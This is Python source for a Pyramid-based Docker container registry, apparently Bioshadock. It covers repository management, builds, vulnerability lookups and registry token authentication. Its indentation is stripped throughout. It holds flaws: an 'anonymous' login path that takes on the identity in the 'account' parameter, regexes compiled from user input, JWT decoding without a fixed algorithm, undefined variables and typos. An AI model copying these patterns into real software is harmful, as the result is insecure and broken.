@view_config(route_name='build', renderer='json', request_method='GET')
def build(request):
'''
Get a build with complete response
'''
user = is_logged(request)
if user is None:
return HTTPForbidden()
build_id = request.matchdict['id']
build = request.registry.db_mongo['builds'].find_one({'_id': ObjectId(build_id)})
repo_id = build['id']
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
return build
@view_config(route_name='containers', renderer='json', request_method='GET')
def containers(request):
user = is_logged(request)
if user is None:
return HTTPForbidden()
repos = request.registry.db_mongo['repository'].find({'$or': [{'user': user['id']}, {'acl_pull.members': user['id']}]})
user_repos = []
for repo in repos:
if 'builds' in repo:
del repo['builds']
if 'Dockerfile' in repo['meta'] and repo['meta']['Dockerfile']:
repo['meta']['Dockerfile'] = True
else:
repo['meta']['Dockerfile'] = False
user_repos.append(repo)
return user_repos
@view_config(route_name='container_manifest', renderer='json', request_method='POST')
def container_manifest(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
token = form['token']
tag = form['tag']
http = urllib3.PoolManager()
headers = {'Authorization': 'Bearer '+token,
'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}
r = http.request('GET', request.registry.config['registry']['docker']+'/v2/'+repo_id+'/manifests/'+tag, headers=headers)
if r.status != 200:
return Response('could not get the manifest', status_code = r.status)
res = json.loads(r.data)
docker_content_digest = None
if 'Docker-Content-Digest' in r.headers:
docker_content_digest = r.headers['Docker-Content-Digest']
else:
docker_content_digest = res['manifests'][0]['digest']
res['Docker-Content-Digest'] = docker_content_digest
return res
@view_config(route_name='container_metaelixir', renderer='json')
def container_metaelixir(request):
repo_id = '/'.join(request.matchdict['id'])
http = urllib3.PoolManager()
r = http.request('GET', request.registry.config['elixir']['biotools_url']+'/api/tool/'+repo_id)
if r.status != 200:
return Response('could not get the metadata', status_code = r.status)
return json.loads(r.data)
@view_config(route_name='container_elixir', renderer='json')
def container_elixir(request):
'''
Update elixir from a container Dockerfile
/container/elixir/x/y/z
'''
if not request.registry.config['elixir']['script']:
return HTTPForbidden('Not configured for Elixir updates')
user = is_logged(request)
if user is None:
try:
apikey = request.params['apikey']
user = request.registry.db_mongo['users'].find_one({'apikey': apikey})
if user is None:
return HTTPForbidden()
except Exception:
return HTTPForbidden()
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
dockerFile = repo['meta']['Dockerfile']
if dockerFile is None or not dockerFile:
return HTTPNotFound('No Dockerfile available')
(tmpfh, tmpfilepath) = tempfile.mkstemp(prefix='elixir')
tmpfile = open(tmpfilepath, 'w')
tmpfile.write(dockerFile)
tmpfile.close()
(tmpfh, tmpxmlpath) = tempfile.mkstemp(prefix='elixir', suffix='.xml')
softname = repo_id.split('/')[-1]
resource = None
try:
parser = Parser(tmpfilepath)
templFile = request.registry.config['elixir']['template']
if not templFile or not os.path.exists(templFile):
return HTTPForbidden('Configuration error, missing template.xml')
parser.parse(templFile, tmpxmlpath)
username = request.registry.config['elixir']['login']
password = request.registry.config['elixir']['password']
biotools = BioTools({
act: 'update',
resFile: tmpxmlpath,
xmlTransportFormat: True
})
resource = biotools.get_resource(options)
jsonResp=biotools.execLoginCmd(username, password)
if 'token' not in jsonResp:
return HTTPForbidden('Could not authentify against bio.tools')
jsonResp=biotools.execRegisterOrUpdateCmd(token, tmpxmlpath, "application/xml")
except Exception as e:
logging.error("Elixir bio.tools call error: "+str(e))
return {'msg': 'An error occured, please contact support team'}
os.remove(tmpfilepath)
os.remove(tmpxmlpath)
affiliation = request.registry.config['elixir']['affiliation']
elixir_name = affiliation+'/'+softname
if 'name' in resource and resource['name']:
elixir_name = affiliation+'/'+resource['name']
request.registry.db_mongo['repository'].update({'_id': repo['_id']},{'$set': {'meta.elixir': elixir_name}})
return {'msg': 'Request executed', 'elixir': elixir_name}
@view_config(route_name='container_tag', renderer='json')
def container_tag(request):
'''
Tags a container
/container/tag/x/y/z/:tagid
'''
user = is_logged(request)
if user is None:
try:
apikey = request.params['apikey']
user = request.registry.db_mongo['users'].find_one({'apikey': apikey})
if user is None:
return HTTPForbidden()
except Exception:
return HTTPForbidden()
repo_elts = list(request.matchdict['id'])
tag = repo_elts.pop()
repo_id = '/'.join(repo_elts)
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
user_id = user['id']
container = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if 'git' not in container['meta'] and not container['meta']['Dockerfile']:
return HTTPForbidden()
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': container['meta']['Dockerfile'],
'git': None,
'cwl_path': container['meta']['cwl_path'],
'user': user_id,
'tag': tag
}
if 'git' in container['meta']:
newbuild['git'] = container['meta']['git']
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
return {'repo': repo_id, 'tag': tag}
@view_config(route_name='container_git', renderer='json')
def container_git(request):
'''
trigger for a git rebuild, must container a Dockerfile in git repo or in container def
'''
user = is_logged(request)
if user is None:
try:
apikey = request.params['apikey']
user = request.registry.db_mongo['users'].find_one({'apikey': apikey})
if user is None:
return HTTPForbidden()
except Exception:
return HTTPForbidden()
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
user_id = 'anonymous'
if user is not None:
user_id = user['id']
container = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if 'git' not in container['meta']:
return HTTPForbidden()
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': container['meta']['Dockerfile'],
'git': container['meta']['git'],
'cwl_path': container['meta']['cwl_path'],
'user': user_id
}
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
return {}
@view_config(route_name='container_dockerfile', renderer='json', request_method='POST')
def container_dockerfile(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
dockerfile = form['dockerfile']
if 'git' not in form:
form['git'] = None
request.registry.db_mongo['repository'].update({'id': repo_id},{'$set': {'meta.Dockerfile': dockerfile}})
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
cwl_path = None
if 'cwl_path' in repo['meta']:
cwl_path = repo['meta']['cwl_path']
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': dockerfile,
'git': form['git'],
'user': user['id'],
'cwl_path': cwl_path
}
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
return {}
@view_config(route_name='container_tags', renderer='json', request_method='POST')
def container_tags(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
token = form['token']
http = urllib3.PoolManager()
headers = {'Authorization': 'Bearer '+token}
r = http.request('GET', request.registry.config['registry']['service']+'/v2/'+repo_id+'/tags/list', headers=headers)
if r.status != 200:
return Response('could not get the manifest', status_code = r.status)
return json.loads(r.data)
@view_config(route_name='container', renderer='json', request_method='DELETE')
def container_delete(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if user is None:
return HTTPForbidden()
if repo is None:
return HTTPNotFound()
if not (is_admin(user['id'], request) or repo['user'] == user['id'] or user['id'] in repo['acl_push']['members']):
return HTTPForbidden()
# Get digest from manifest Docker-Content-Digest sha256:95b09cb5b7cd38d73a7dc9618c34148559cf1ed3a0066c85d37e1d6cf4fb9004
# Send DELETE request DELETE /v2/<name>/manifests/<reference>
# Commented, removing image seems to remove some layers used by other image
# Delete from database but keep in ever growing registry
'''
form = json.loads(request.body, encoding=request.charset)
token = form['token']
tag = 'latest'
if 'tag' in form:
tag = form['tag']
http = urllib3.PoolManager()
headers = {'Authorization': 'Bearer '+token,
'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}
r = http.request('GET', request.registry.config['registry']['docker']+'/v2/'+repo_id+'/manifests/'+tag, headers=headers)
if r.status == 404:
logging.warn('Registry could not get the manifest '+repo_id)
else:
res = json.loads(r.data)
docker_content_digest = None
if 'Docker-Content-Digest' in r.headers:
docker_content_digest = r.headers['Docker-Content-Digest']
else:
docker_content_digest = res['manifests'][0]['digest']
r = http.request('DELETE', request.registry.config['registry']['docker']+'/v2/'+repo_id+'/manifests/'+docker_content_digest, headers=headers)
if r.status != 202:
logging.error('Could not find or delete image ' + repo_id + 'in registry')
'''
request.registry.db_mongo['repository'].remove({'id': repo_id})
request.registry.db_mongo['builds'].remove({'id': repo_id})
request.registry.db_mongo['versions'].remove({'repo': repo_id})
request.registry.es.delete(index="bioshadock", doc_type='container', id=repo_id)
return repo
@view_config(route_name='container', renderer='json', request_method='POST')
def container_update(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if user is None:
return HTTPForbidden()
if repo is None:
return HTTPNotFound()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_push']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
if 'git' not in form['meta']:
form['meta']['git'] = None
if 'elixir' not in form['meta']:
form['meta']['elixir'] = None
if 'cwl_path' not in form['meta']:
form['meta']['cwl_path'] = None
updates = {
'acl_push.members': form['acl_push']['members'],
'acl_pull.members': form['acl_pull']['members'],
'meta.description': form['meta']['description'],
'meta.short_description': form['meta']['short_description'],
'meta.tags': form['meta']['tags'],
'meta.terms': form['meta']['terms'],
'meta.git': form['meta']['git'],
'meta.elixir': form['meta']['elixir'],
'meta.cwl_path': form['meta']['cwl_path'],
'visible': form['visible']
}
repo['acl_push']['members'] = form['acl_push']['members']
repo['acl_pull']['members'] = form['acl_pull']['members']
repo['meta']['description'] = form['meta']['description']
repo['meta']['tags'] = form['meta']['tags']
repo['meta']['terms'] = form['meta']['terms']
repo['meta']['cwl_path'] = form['meta']['cwl_path']
repo['visible'] = form['visible']
if is_admin(user['id'], request) or repo['user'] == user['id'] or user['id'] in repo['acl_push']['members']:
repo['user_can_push'] = True
else:
repo['user_can_push'] = False
request.registry.db_mongo['repository'].update({'id': repo_id}, {'$set': updates})
es_repo = copy.deepcopy(repo)
del es_repo['_id']
del es_repo['builds']
request.registry.es.index(index="bioshadock", doc_type='container', id=repo_id, body=es_repo)
return repo
@view_config(route_name='clair_notification', renderer='json', request_method='POST')
def clair_notification(request):
'''
Receive a Clair notification about an update. Simply delete notification, no handling for the moment
'''
form = json.loads(request.body, encoding=request.charset)
notif = form['Notification']['Name']
'''
page = 1
limit = 100
# Get notification
loop = True
while loop:
r = http.request('GET', equest.registry.settings['clair.host']+'/v1/notification/'+notif+'?page='+str(page)+'&limit='+str(limit))
if r.status != 200:
loop = False
res = json.loads(r.data)
layers = res['Notification']['New']['LayersIntroducingVulnerability']
for layer in layers:
# Find repo using layer and udpate notifications
page += 1
'''
# Mark as read
http = urllib3.PoolManager()
http.request('DELETE', request.registry.config['clair']['host']+'/v1/notification/'+notif)
return {}
@view_config(route_name='container_vulnerabilities', renderer='json', request_method='GET')
def container_vulnerabilities(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
# Get vulnerabilities from Clair
if request.registry.config['clair']['use'] != 1:
return HTTPForbidden()
cfg = {
'clair.host': request.registry.config['clair']['host'],
'docker.connect': request.registry.config['services']['docker']['connect']
}
image_vulnerabilities = Clair(cfg)
version = None
try:
version = request.params['version'].replace('.', '_')
except Exception:
pass
logging.debug('Search vulnerabilities for '+repo_id+':'+str(version))
if version is not None:
if 'version' in repo['meta'] and version in repo['meta']['version']:
layers = repo['meta']['version'][version]['layers']
else:
return HTTPNotFound()
if version is None:
if 'layers' not in repo['meta'] or not repo['meta']['layers']:
return HTTPNotFound()
else:
layers = repo['meta']['layers']
return image_vulnerabilities.get_layers_vulnerabilities(layers)
@view_config(route_name='container', renderer='json', request_method='GET')
def container(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
if user and (is_admin(user['id'], request) or repo['user'] == user['id'] or user['id'] in repo['acl_push']['members']):
repo['user_can_push'] = True
else:
repo['user_can_push'] = False
return repo
@view_config(route_name='containers_new', renderer='json', request_method='POST')
def containers_new(request):
user = is_logged(request)
if user is None:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
if 'git' not in form or not form['git']:
form['git'] = None
repo_id = form['name']
repo_name = repo_id.split('/')
if len(repo_name) == 1:
return HTTPForbidden("Invalid repository name, must match X/Y")
if user_can_push(user['id'], repo_id, request):
request.registry.db_mongo['repository'].update({'id': repo_id},
{'$set': {'meta.short_description': form['description'],
'meta.description': '',
'meta.Dockerfile': form['dockerfile'],
'meta.git': form['git'],
'meta.cwl_path': None,
'visible': form['visible'] in ['true', 1]}
})
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': form['dockerfile'],
'git': form['git'],
'user': user['id'],
'cwl_path': None
}
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
es_repo = copy.deepcopy(repo)
del es_repo['_id']
del es_repo['builds']
res = request.registry.es.index(index="bioshadock", doc_type='container', id=repo_id, body=es_repo)
return repo
else:
return HTTPForbidden()
@view_config(route_name='containers_search', renderer='json', request_method='POST')
def containers_search(request):
form = json.loads(request.body, encoding=request.charset)
search = form['search']
user = is_logged(request)
regx = re.compile(search, re.IGNORECASE)
if user is None:
repos = request.registry.db_mongo['repository'].find({'visible': True, 'id': regx})
else:
repos = request.registry.db_mongo['repository'].find({'$or': [{'visible': True}, {'user': user['id']}, {'acl_pull.members': user['id']}], 'id': regx})
user_repos = []
for repo in repos:
user_repos.append(repo)
return user_repos
@view_config(route_name='api_repositories_images_layer_access', renderer='json', request_method='GET')
def api_repositories_images_layer_access(request):
'''
Library repo
/v1/repositories/{namespace}/{image}/layer/{id}/access
'''
#print str(request)
repo_id = str(request.matchdict['namespace'])+'/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
except Exception as e:
print str(e)
return HTTPForbidden(str(e))
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
return {'access':True}
@view_config(route_name='api_library', renderer='json', request_method='DELETE')
def api_library_delete(request):
repo_id = None
repo_id = 'library/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_delete(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return Response()
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'delete',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600*24)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.registry.db_mongo['repository'].remove({'id': repo_id})
request.response.headerlist.extend(headers)
return Response('Accepted', status_code=202, headerlist=request.response.headerlist)
@view_config(route_name='api_library', renderer='json', request_method='PUT')
def api_library_push(request):
'''
Library repo
/v1/repositories/{image}
'''
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = 'library/'+ request.matchdict['image']
endpoints = request.registry.config['docker']['registry']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_push(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
request.registry.db_mongo['repository'].update({'id': repo_id}, {"$set":{'images': images}})
(type, bearer) = request.authorization
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'write',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.response.headerlist.extend(headers)
return Response('Created', headerlist=request.response.headerlist)
@view_config(route_name='api_library_images', renderer='json', request_method='GET')
def api_library_images(request):
'''
Library repo
/v1/repositories/{image}/images
'''
#images = json.loads(request.body, encoding=request.charset)
repo_id = 'library/' + request.matchdict['image']
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return HTTPNotFound()
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= <PASSWORD>
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request):
return HTTPForbidden()
(type, bearer) = request.authorization
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'read',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=read"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.registry.db_mongo['repository'].update({'id': repo_id},{"$inc": { "pulls": 1}})
request.response.headerlist.extend(headers)
return Response(json.dumps(existing_repo['images']), headerlist=request.response.headerlist)
@view_config(route_name='api_library_images', renderer='json', request_method='PUT')
def api_library_images_push(request):
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = 'library/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= <PASSWORD>
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request):
return HTTPForbidden()
if images:
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return HTTPNotFound()
return {"access": True}
else:
return Response('',status_code=204)
@view_config(route_name='api_library_auth', renderer='json', request_method='PUT')
def api_library_auth(request):
'''
Library repo
/v1/repositories/{image}/auth
'''
repo_id = 'library/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
if msg['acl'] == 'delete':
return Reponse('')
else:
return HTTPForbidden()
except Exception as e:
print str(e)
return HTTPForbidden(str(e))
else:
return HTTPForbidden()
@view_config(route_name='api_repositories_images_get', renderer='json', request_method='GET')
def api_repositories_images(request):
'''
Library repo
/v1/repositories/{namespace}/{image}/images
'''
repo_id = str(request.matchdict['namespace'])+'/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
except Exception as e:
print str(e)
return HTTPForbidden(str(e))
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
images = []
for image in repo['images']:
images.append(image)
return images
@view_config(route_name='api_repositories_images_put', renderer='json', request_method='PUT')
def api_repositories_images_push(request):
'''
Library repo
/v1/repositories/{namespace}/{image}/images
'''
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = request.matchdict['namespace'] + '/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= <PASSWORD>
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request):
return HTTPForbidden()
if images:
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return HTTPNotFound()
return {"access": True}
else:
return Response('',status_code=204)
@view_config(route_name='api_library', renderer='json', request_method='DELETE')
def api_library_delete(request):
repo_id = None
repo_id = request.matchdict['namespace'] + '/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= None
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_delete(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if existing_repo is None:
return Response('')
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'delete',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.registry.db_mongo['repository'].remove({'id': repo_id})
request.response.headerlist.extend(headers)
return Response('Accepted', status_code=202, headerlist=request.response.headerlist)
@view_config(route_name='api_repositories_auth', renderer='json', request_method='PUT')
def api_repositories_auth(request):
'''
Library repo
/v1/repositories/{image}/auth
'''
repo_id = request.matchdict['namespace'] + '/'+str(request.matchdict['image'])
secret = request.registry.config['registry']['secret_passphrase']
token = None
if request.authorization:
(type, bearer) = request.authorization
token = bearer.split(',')[0].replace('signature=','')
try:
msg = jwt.decode(token, secret)
if msg['acl'] == 'delete':
return Reponse('')
else:
return HTTPForbidden()
except Exception as e:
print str(e)
return HTTPForbidden(str(e))
else:
return HTTPForbidden()
@view_config(route_name='api_repositories', renderer='json', request_method='PUT')
def api_repositories_push(request):
'''
Library repo
/v1/repositories/{namespace}/{image}
'''
images = json.loads(request.body, encoding=request.charset)
repo_id = None
repo_id = request.matchdict['namespace'] + '/'+ request.matchdict['image']
endpoints = request.registry.config['registry']['docker']
secret = request.registry.config['registry']['secret_passphrase']
username = None
password= <PASSWORD>
if request.authorization:
(type, bearer) = request.authorization
username, password = decode(bearer)
if not valid_user(username, password, request) or not user_can_push(username, repo_id, request):
return HTTPForbidden()
existing_repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
request.registry.db_mongo['repository'].update({'id': repo_id}, {"$set":{'images': images}})
(type, bearer) = request.authorization
token = jwt.encode({'repo': repo_id,
'user': username,
'acl': 'write',
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600)
}, secret)
docker_token = "signature="+token+",repository=\""+repo_id+"\",access=write"
headers = [("WWW-Authenticate", "Token "+docker_token.encode('utf8')),
("X-Docker-Endpoints", endpoints),("X-Docker-Token", docker_token.encode('utf8'))
]
request.response.headerlist.extend(headers)
return Response('Created', headerlist=request.response.headerlist)
@view_config(route_name='api_other', renderer='json')
def api_other(request):
print "#Other v1 Route: "+str(request.matchdict['api'])
print str(request)
return HTTPForbidden()
@view_config(route_name='api2_other', renderer='json')
def api2_other(request):
print "#Other v2 Route: "+str(request.matchdict['api'])
print str(request)
return Response('OK')
@view_config(route_name='api_ping', renderer='json')
def api_ping(request):
print str('ping')
headers = [("X-Docker-Registry-Config", "local"),
("X-Docker-Registry-Standalone", "false")
]
request.response.headerlist.extend(headers)
return Response('OK', headerlist=request.response.headerlist)
@view_config(route_name='api2_ping', renderer='json')
def api2_ping(request):
print str('ping')
headers = [("X-Docker-Registry-Config", "local"),
("X-Docker-Registry-Standalone", "false")
]
request.response.headerlist.extend(headers)
return Response('OK', headerlist=request.response.headerlist)
def to_bytes(n, length):
return bytes( (n >> i*8) & 0xff for i in reversed(range(length)))
def user_can_delete(username, repository, request):
user_repo = repository
repos = repository.split('/')
#if len(repos) == 1:
# user_repo = 'library/'+repository
existing_repo = request.registry.db_mongo['repository'].find_one({'id': user_repo})
if existing_repo is not None:
if existing_repo['user'] == username or is_admin(username, request):
return True
else:
return False
else:
return False
def user_can_push(username, repository, request):
if username == 'anonymous':
return False
user_repo = repository
is_library = False
repos = repository.split('/')
if len(repos) == 1:
return False
if repos[0] == 'library':
if not can_push_to_library(username, request):
return False
#user_repo = 'library/'+repository
is_library = True
existing_repo = request.registry.db_mongo['repository'].find_one({'id': user_repo})
if existing_repo is not None:
if existing_repo['user'] == username or username in existing_repo['acl_push']['members'] or username in request.registry.admin:
return True
else:
return False
else:
user_db = request.registry.db_mongo['users'].find_one({'id': username})
if user_db is None:
return False
else:
# Contributors can push only is specified
if user_db['role'] == 'contributor' and request.registry.config['general']['contributor_can_push'] != 1:
return False
# Visitors cannot push
if user_db['role'] == 'visitor':
return False
if not is_library or (is_library and can_push_to_library(username, request)):
repo = { 'id' : user_repo,
'user': username,
'pulls': 0,
'visible': True,
'library': is_library,
'meta': {
'tags': [],
'terms': [],
'description': None,
'Dockerfile': None
},
'acl_push': { 'members': [], 'groups': [] },
'acl_pull': { 'members': [], 'groups': [] },
'builds': []
}
request.registry.db_mongo['repository'].insert(repo)
notify_new_container_email(request, repo)
es_repo = copy.deepcopy(repo)
del es_repo['_id']
del es_repo['builds']
res = request.registry.es.index(index="bioshadock", doc_type='container', id=user_repo, body=es_repo)
return True
else:
return False
def user_can_pull(username, repository, request):
user_repo = repository
repos = repository.split('/')
#if len(repos) == 1:
# user_repo = 'library/'+repository
existing_repo = request.registry.db_mongo['repository'].find_one({'id': user_repo})
if existing_repo is not None:
if existing_repo['user'] == username or username in existing_repo['acl_pull']['members'] or username in request.registry.admin:
return True
else:
if existing_repo['visible']:
return True
else:
return False
else:
return False
@view_config(route_name='api2_token', renderer='json')
def api2_token(request):
account = None
try:
account = request.params['account']
except Exception:
pass
service = request.params['service']
scopes = None
try:
#scope = request.params['scope']
scopes = request.GET.getall('scope')
except Exception:
pass
if request.authorization or request.authorization is None:
# Login request
if request.authorization is None:
account = 'anonymous'
if account != 'anonymous' and not is_logged(request):
(bearer_type, bearer) = request.authorization
username, password = decode(bearer)
if username == 'anonymous':
username = account
elif not valid_user(username, password, request):
logging.error("User authentication failure")
return HTTPForbidden()
else:
username = account
secret = None
private_key = None
passphrase = None
if request.registry.config['certs']['private_key_passphrase']:
passphrase = request.registry.config['certs']['private_key_passphrase']
with open(request.registry.config['certs']['private_key'], 'r') as content_file:
private_key = load_pem_private_key(content_file.read().encode('utf-8'),
password=<PASSWORD>, backend=default_backend())
pub_key = None
pem = None
exponent = None
modulus = None
with open(request.registry.config['certs']['public_key'], 'r') as content_file:
pub_key = content_file.read().encode('utf-8')
pub_key = load_pem_x509_certificate(pub_key, backend=default_backend())
pub_key = pub_key.public_key()
pem = pub_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
pub_numbers = pub_key.public_numbers()
exponent = pub_numbers._e
modulus= pub_numbers._n
modulus = ('%%0%dx' % (256 << 1) % modulus).decode('hex')[-256:]
exponent = ('%%0%dx' % (3 << 1) % exponent).decode('hex')[-3:]
der = None
with open(request.registry.config['certs']['cacert_der'], 'rb') as content_file:
der = content_file.read()
access = []
if scopes is not None:
access = []
for scope in scopes:
scope = scope.split(':')
repo_type = scope[0]
repository = scope[1]
actions = scope[2].split(',')
allowed_actions = []
for action in actions:
if action == 'push' and user_can_push(username, repository, request):
allowed_actions.append(action)
if action == 'pull' and user_can_pull(username, repository, request):
allowed_actions.append(action)
request.registry.db_mongo['repository'].update({'id': repository},{"$inc": { "pulls": 1}})
